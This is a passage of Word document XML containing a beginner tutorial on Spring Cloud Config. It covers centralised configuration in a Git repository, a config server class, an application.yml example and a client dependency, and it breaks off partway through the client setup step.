    <w:p w14:paraId="69AD75A8" w14:textId="77777777" w:rsidR="00C01003" w:rsidRPr="00CE4B95" w:rsidRDefault="00C01003" w:rsidP="00C01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pring Cloud Config is a part of the Spring Cloud ecosystem that provides server-side and client-side support for externalized configuration in a distributed system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E87932F" w14:textId="77777777" w:rsidR="00C01003" w:rsidRPr="00CE4B95" w:rsidRDefault="00C01003" w:rsidP="00C0100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re Idea:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72265427" w14:textId="77777777" w:rsidR="00C01003" w:rsidRPr="00CE4B95" w:rsidRDefault="00C01003" w:rsidP="00C01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Keep all your configuration files (application.yml/properties) for different microservices in one centralized Git repository, and let microservices fetch their configs from there.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43775374" w14:textId="77777777" w:rsidR="00C01003" w:rsidRPr="00CE4B95"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C94BB1B">
          <v:rect id="_x0000_i2785" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C96993" w14:textId="77777777" w:rsidR="00C01003" w:rsidRPr="00CE4B95" w:rsidRDefault="00C01003" w:rsidP="00C0100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Why Centralized Configuration?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E3FD79" w14:textId="77777777" w:rsidR="00C01003" w:rsidRPr="00CE4B95" w:rsidRDefault="00C01003" w:rsidP="00C010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Without centralized config:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757FF953" w14:textId="77777777" w:rsidR="00C01003" w:rsidRPr="00CE4B95" w:rsidRDefault="00C01003">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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ch microservice maintains its own config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498CD46C" w14:textId="77777777" w:rsidR="00C01003" w:rsidRPr="00CE4B95" w:rsidRDefault="00C01003">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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ifficult to manage multiple environments (dev, test, prod)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABE0309" w14:textId="77777777" w:rsidR="00C01003" w:rsidRPr="00CE4B95" w:rsidRDefault="00C01003">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="188"/>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hanges require service restarts or redeployments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5238739A" w14:textId="77777777" w:rsidR="004B6899" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6899" w:rsidP="004B6899">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5814ACDC" w14:textId="77777777" w:rsidR="004B6899" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6899" w:rsidP="004B6899">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="067C49FB" w14:textId="77777777" w:rsidR="004B6899" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6899" w:rsidP="004B6899">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04DC5EC2" w14:textId="2C384A04" w:rsidR="004B6899" w:rsidRPr="00CE4B95" w:rsidRDefault="00C01003" w:rsidP="004B6899">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">With centralized config: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6057C32C" w14:textId="77777777" w:rsidR="00A15B12" w:rsidRPr="00CE4B95" w:rsidRDefault="00C01003">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="189"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Easier updates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1214477C" w14:textId="77777777" w:rsidR="00A15B12" w:rsidRPr="00CE4B95" w:rsidRDefault="00C01003">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="189"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Environment</w:t>
      </w:r>
      <w:r w:rsidR="004B6899" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>separation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5D76BB" w14:textId="77777777" w:rsidR="00A15B12" w:rsidRPr="00CE4B95" w:rsidRDefault="00C01003">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="189"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Consistent versioning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268734E8" w14:textId="081C3658" w:rsidR="00C01003" w:rsidRPr="00CE4B95" w:rsidRDefault="00C01003">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="189"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Reloadable configs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C056A72" w14:textId="77777777" w:rsidR="00C01003" w:rsidRPr="00CE4B95"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0DABA59">
          <v:rect id="_x0000_i2786" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D159CC" w14:textId="77777777" w:rsidR="00C01003" w:rsidRPr="00CE4B95" w:rsidRDefault="00C01003" w:rsidP="00C0100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mponents of Spring Cloud Config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086EE4C5" w14:textId="77777777" w:rsidR="00C01003" w:rsidRPr="00CE4B95" w:rsidRDefault="00C01003" w:rsidP="00C010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Config Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214AFE22" w14:textId="77777777" w:rsidR="00C01003" w:rsidRPr="00CE4B95" w:rsidRDefault="00C01003" w:rsidP="00C01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osts the configuration files centrally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55042A67" w14:textId="77777777" w:rsidR="00C01003" w:rsidRPr="00CE4B95" w:rsidRDefault="00C01003" w:rsidP="00C010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Config Client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDB9945" w14:textId="77777777" w:rsidR="00C01003" w:rsidRPr="00CE4B95" w:rsidRDefault="00C01003" w:rsidP="00C01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ach microservice acts as a client and fetches config from the config server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5293BC77" w14:textId="77777777" w:rsidR="00C01003" w:rsidRPr="00CE4B95"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22BC35F">
          <v:rect id="_x0000_i2787" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B1F740" w14:textId="77777777" w:rsidR="00C01003" w:rsidRPr="00CE4B95" w:rsidRDefault="00C01003" w:rsidP="00C0100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How to Set It Up</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6719CF" w14:textId="77777777" w:rsidR="00C01003" w:rsidRPr="00CE4B95" w:rsidRDefault="00C01003" w:rsidP="00C0100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tep 1: Create a Git Repo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4455DF95" w14:textId="77777777" w:rsidR="00C01003" w:rsidRPr="00CE4B95" w:rsidRDefault="00C01003" w:rsidP="00C01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ructure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5F4870" w14:textId="77777777" w:rsidR="00C01003" w:rsidRPr="00CE4B95" w:rsidRDefault="00C01003" w:rsidP="00C01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y-config-repo/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646AE520" w14:textId="77777777" w:rsidR="00C01003" w:rsidRPr="00CE4B95" w:rsidRDefault="00C01003" w:rsidP="00C01003">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>── application.yml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E4E0CD" w14:textId="77777777" w:rsidR="00C01003" w:rsidRPr="00CE4B95" w:rsidRDefault="00C01003" w:rsidP="00C01003">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>── user-service-dev.yml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E91130F" w14:textId="77777777" w:rsidR="00C01003" w:rsidRPr="00CE4B95" w:rsidRDefault="00C01003" w:rsidP="00C01003">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>── order-service-prod.yml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E94E039" w14:textId="77777777" w:rsidR="00C01003" w:rsidRPr="00CE4B95"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3F2E197">
          <v:rect id="_x0000_i2788" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="006A9FE9" w14:textId="77777777" w:rsidR="00C01003" w:rsidRPr="00CE4B95" w:rsidRDefault="00C01003" w:rsidP="00C0100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tep 2: Create a Spring Cloud Config Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689D2484" w14:textId="77777777" w:rsidR="006B7917" w:rsidRPr="00CE4B95" w:rsidRDefault="006B79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179596"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@SpringBootApplication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8EDD6D" w14:textId="77777777" w:rsidR="006B7917" w:rsidRPr="00CE4B95" w:rsidRDefault="006B79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179596"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@EnableConfigServer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D19A01" w14:textId="77777777" w:rsidR="006B7917" w:rsidRPr="00CE4B95" w:rsidRDefault="006B79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179596"/>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onfigServerApp</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420DF87F" w14:textId="77777777" w:rsidR="006B7917" w:rsidRPr="00CE4B95" w:rsidRDefault="006B79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1795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stat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oid</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> mai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2D02FBB3" w14:textId="77777777" w:rsidR="006B7917" w:rsidRPr="00CE4B95" w:rsidRDefault="006B79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1795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pringApplication</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ru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ConfigServerApp</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clas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args</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667EDA84" w14:textId="77777777" w:rsidR="006B7917" w:rsidRPr="00CE4B95" w:rsidRDefault="006B79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179596"/>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1770A226" w14:textId="2EE5DB4E" w:rsidR="006B7917" w:rsidRPr="00CE4B95" w:rsidRDefault="006B79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179596"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C0C212" w14:textId="77777777" w:rsidR="00C01003" w:rsidRPr="00CE4B95" w:rsidRDefault="00C01003" w:rsidP="00C010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pplication.yml:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49830E56" w14:textId="77777777" w:rsidR="00895145" w:rsidRPr="00CE4B9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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>server</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C9E630" w14:textId="77777777" w:rsidR="00895145" w:rsidRPr="00CE4B9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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  port</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8888</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33909D53" w14:textId="77777777" w:rsidR="00895145" w:rsidRPr="00CE4B9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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF0437B" w14:textId="77777777" w:rsidR="00895145" w:rsidRPr="00CE4B9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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>spring</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1559A6B8" w14:textId="77777777" w:rsidR="00895145" w:rsidRPr="00CE4B9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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  cloud</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5D9CF0" w14:textId="77777777" w:rsidR="00895145" w:rsidRPr="00CE4B9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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    config</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415A7097" w14:textId="77777777" w:rsidR="00895145" w:rsidRPr="00CE4B9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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      server</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459E1CAF" w14:textId="77777777" w:rsidR="00895145" w:rsidRPr="00CE4B9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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        git</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE82315" w14:textId="17434880" w:rsidR="00895145" w:rsidRPr="00CE4B9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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">          ur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https</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>//github.com/my-org/my-config-repo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B18590" w14:textId="77777777" w:rsidR="00C01003" w:rsidRPr="00CE4B95"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7C51BAC">
          <v:rect id="_x0000_i2789" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="065D9798" w14:textId="77777777" w:rsidR="00C01003" w:rsidRPr="00CE4B95" w:rsidRDefault="00C01003" w:rsidP="00C0100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tep 3: Configure Microservices (Config Clients)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8D5120" w14:textId="77777777" w:rsidR="00C01003" w:rsidRPr="00CE4B95" w:rsidRDefault="00C01003" w:rsidP="00C010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dd dependency:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F69DBB4" w14:textId="77777777" w:rsidR="00C01003" w:rsidRPr="00CE4B95" w:rsidRDefault="00C01003" w:rsidP="00C01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lementation 'org.springframework.cloud:spring-cloud-starter-config'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634188E0" w14:textId="77777777" w:rsidR="005D6B26" w:rsidRPr="00CE4B95" w:rsidRDefault="005D6B26" w:rsidP="00C01003">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
